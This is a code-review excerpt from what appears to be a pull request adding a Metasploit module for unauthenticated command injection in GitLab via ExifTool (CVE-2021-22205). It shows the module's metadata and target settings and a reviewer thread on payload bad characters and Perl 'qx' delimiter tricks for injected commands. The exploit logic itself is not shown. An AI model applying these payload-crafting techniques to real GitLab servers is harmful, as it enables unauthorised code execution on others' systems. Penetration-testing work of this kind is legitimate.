modules/exploits/multi/http/gitlab_exif_rce.rb

```diff
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection',
+        'Description' => %q{
+          This module exploits an unauthenticated file upload and command
+          injection vulnerability in GitLab Community Edition (CE) and
+          Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6,
+          and 13.8.8.
+
+          Exploitation will result in command execution as the git user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'William Bowling',  # Vulnerability discovery and CVE-2021-22204 PoC
+          'jbaines-r7'        # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2021-22205' ], # GitLab
+          [ 'CVE', '2021-22204' ], # ExifTool
+          [ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ],
+          [ 'URL', 'https://hackerone.com/reports/1154542' ],
+          [ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis' ],
+          [ 'URL', 'https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/' ]
+        ],
+        'DisclosureDate' => '2021-04-14',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {
+                'Space' => 290,
+                'DisableNops' => true,
+                'BadChars' => ''
```

Comment:
Is `}` a badchar?

Reply:
Technically, not. As long as it's escaped, it's fine. e.g.

`qx{echo vakzz} >/tmp/vakzz}`

Doesn't echo to /tmp/vakzz, but

`qx{echo vakzz\} >/tmp/vakzz}`

Does. Certainly, it requires special handling but _can_ appear in a payload. So, I'm not exactly sure if it needs to be in BadChars or not?

Reply:
Yes, it's a permitted character if it's escaped or encoded away. It's a badchar if you're not handling any of that yourself. Up to you.

Reply:
You can change the delimiter, too, if you wish.

Reply:
```
wvu@kharak:~$ perl -e 'print qx,whoami,'
wvu
wvu@kharak:~$
```

Reply:
That's a pretty good point. I can probably pretty safely switch to `#` as it's one of the few special characters that are pretty useless for our purposes, and therefore unlikely to appear.